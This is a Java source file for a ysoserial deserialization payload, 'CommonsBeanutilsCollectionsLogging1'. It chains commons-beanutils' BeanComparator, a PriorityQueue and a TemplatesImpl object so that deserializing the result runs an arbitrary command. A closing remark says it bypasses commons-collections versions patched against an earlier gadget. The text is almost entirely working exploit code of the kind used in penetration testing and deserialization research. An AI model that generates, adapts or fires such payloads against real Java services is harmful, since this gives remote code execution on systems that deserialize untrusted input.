commons beanutils gadget chain

CommonsBeanutilsCollectionsLogging1.java

package ysoserial.payloads;

import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;

import org.apache.commons.beanutils.BeanComparator;

import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload<Object> { 

	public Object getObject(final String command) throws Exception {		
		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
		// mock method name until armed
		final BeanComparator<Object> comparator = new BeanComparator<Object>("lowestSetBit");
		
		// create queue with numbers and basic comparator
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator); 
		// stub data for replacement later
		queue.add(new BigInteger("1")); 
		queue.add(new BigInteger("1")); 
		
		// switch method called by comparator
		Reflections.setFieldValue(comparator, "property", "outputProperties"); 
		
		// switch contents of queue
		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = templates;
		queueArray[1] = templates;
		
		return queue;
	}
	
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args);
	}
}

Note that while this requires commons-logging and commons-collections, the latter can be a version patched against the original CommonsCollections1 gadget chain.

Integrated into ysoserial v0.0.4